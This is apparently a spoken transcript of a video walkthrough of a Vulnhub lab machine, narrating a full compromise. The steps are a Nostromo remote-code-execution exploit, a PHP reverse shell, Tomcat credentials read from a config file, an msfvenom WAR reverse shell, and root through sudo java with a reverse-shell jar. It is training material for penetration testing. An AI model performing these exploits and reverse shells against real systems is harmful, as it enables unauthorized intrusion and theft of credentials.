Hey everybody, Vince here. Today we're going to work on my web server 1. This is from the author of the Tomcat server that I just did previously. So we're going to kick off with nmap sv st o a p a6 128. That's going to take a second. I'm going to pop another tab here, Shift Control T, because I know we're going to have several of these. System actually comes back pretty quick, but what we can do is we can hit the spacebar or tab, or actually I think I hit return, and it tells us how much time is remaining. Let's see what happens if we hit spacebar. Actually, if we hit the spacebar, it does nothing. So hit enter, return. Oh, there we go. So we kick back here. Let's see, we got SSH. We've got 80. So if we look at 80, 6, 128, looks like we got a WordPress site. If we come over here, we hit this. This is Wappalizer. It's just a little plugin. It tells us kind of some information about what we're looking at. This is WordPress 532. It's fairly current. So this is definitely an angle that we could pursue. The thing that sticks out to me is this thing, Nostromo. I see some other things down here, but these are all familiar. This isn't familiar to me. So I'm going to just run search exploit real quick. Nostromo. And so version 196 has remote code execution. So we can use search exploit -m, and we can give it this path because it's just a partial path. But what it'll do is it'll copy it into our working directory. So let's open this up real quick. So I know something that's going to cause us a problem already. So let me show you. So if I hit Python or 7, we get this error. And that's because there's a line in here where it has this CVE, but it's not commented. So that's going to cause us a problem. So let's just comment that out. And let's scroll through here, just kind of take a look at this. So it's asking for a target IP, target port, and command. This seems pretty straightforward. Okay, so let's close this up, save our changes. Let's run it again just to make sure that it works. Cool. All right, so let's give it the target IP, which is for me 128. It's on port 2222, and let's just go for ID. Cool. So this is we have command execution. So I could try and put a shell in here. Problem is there's going to be all these different characters and something might hang up. So what I'm going to do, actually before I even do that, I'm going to show you what shell I'm using. So in Kali, we look under user share web shells PHP. Actually, it's web shells. Actually, let's just start there. So there's tons of web shells that are available to us. So if we look under PHP, there's this one, PHP reverse shell.php. And this is just the Pentest Monkey reverse shell that everybody uses and I use all the time. I have a bunch of versions of these under my www directory so that I can pull them across. And because we are calling this, if we, where am I? Sorry, I'm thinking and chewing bubblegum at the same time. If we try to call this across as PHP, it's going to shell our own box. So what we want to do is we want to call it across as the txt file. So basically just rename it from PHP to txt. So and 699. So our shell 443.txt is what I call mine. And then we're going to output it. And I'm going to put this in temp, and I'm going to call it our shell 443.php. Let's make sure this is right. Get txt o. Cool. And so we see down here that our shell was saved. So now what we're going to do, sorry, I'm being lazy and I just don't want to type. Now we're going to call php/temp our shell 443.php, but first must set up my handler, but that's not going to go anywhere. So I'm going to listen on 443 because that's where mine is set up. And we're going to hit enter and it stops. So I assume I have a shell. So we get our ID. Okay. So this is daemon. Let's clean this up. Python -c import pty dot spawn bin bash. Close that off. So it looks good. Export term equals x term. Everything working. Cool. All right. So one of the things I noticed was that we have a Tomcat server running. So if we go over to 8080, this looks very much like the Tomcat server that I did in the previous video. And this was the other Vulnhub box from the same author. And in that case, we were able to use Tomcat and Tomcat. But in this one, we're not. But we're on the box. So what we can do is we can cat user local tomcat conf /tomcat users.xml, and we should see some usernames and passwords in here. So we are interested in this one right here. So it is the username of Tomcat and this password right here. So let's just copy that. Let's come back over here. Let's back up, manager app, Tomcat. Let's throw in this password and we're in. So like in the previous video, we're going to upload a WAR file. And if you haven't seen that, check out the other video that I posted a few days ago. But we're going to spawn a new window here. So Shift Control T, and I'm going to create a reverse shell in the format of a WAR file. So MSF Venom -p, and we're going to call this Java JSP underscore shell underscore reverse underscore TCP, and we're going to say all host, and this is our attacking machine. For me, that's 99, our port. So our listening port, and that's 443. We're going to do our output is a WAR file, and we're going to call this 192 shell.war. Okay, do I have this right? Java JSP shell reverse underscore TCP looks good. All right, we hit enter. We're going to open up another tab. We're going to set up another listening port and C minus LVP 443. And so when this finishes, we're going to come over here and we're going to upload and deploy it. All right, so what do we got here? MSF Venom is slow for everything. All right, we're done. Cool. So we're going to browse, and here's our shell war file, and we're going to deploy it. There it is at the top. Just want to double check. Okay, so my listener is set up, and if we click on this, we should catch a shell. Excellent. Saw it in the background. All right, cool. So let's clean this up. Python -c import pty.spawn. Can't type. And bash. Is that right? Cool. Export term, next term. So I'm going to run sudo -l, and like the other box, we have the ability to run Java as root with no password. So we're going to spawn yet another tab, and we're going to do MSF Venom -p. This time we're going to do Java /shell underscore reverse underscore TCP lhost. Again, this is our attacking machine. Our listening port on 443. Format output is jar file this time. We're going to call this 192 shell.jar. Java shell reverse. Okay, excellent. So again, waiting for MSFNM. We're going to open up another tab. We're set up yet another listener. Meanwhile, I'm going to move into temp, and I'm going to pull this across to 168.699, 192 shell dot jar. And we're going to do output 192 shell dot jar. Let's make sure this thing is finished. What did I do? I didn't direct it. That's funny. All right, let's up arrow. All right. So this time we're going to output it into a file instead of to the screen and make a giant mess. Come on, MSF Venom. All right. So now we're going to copy this. Actually, I'm going to make sure I don't have anything in my www directory because I tend to use the same names. So let's do rm r www html star.jar. All right, now let's copy 182 jar var www html. And then we're going to come back here and we're going to pull this down, our output. All right, so that looks good. And we've got that saved. And we've got our handler set up over here. Okay, good. And so now I'm just going to go back to sudo because I want to see this. So we're going to run sudo and we're going to copy this and we're going to paste it. And we're going to call it 192. So we're going to do jar 192 shell.jar. Okay, and we should have our inbound shell. And we check our ID. We are root. So let's do ls root. And there's our proof file. I'm not going to cat that for you. I'm going to let you take care of that. But that is a wrap. Hope you enjoyed it. And if you have any questions or comments or feedback, hit me up on Twitter or on YouTube. Thanks.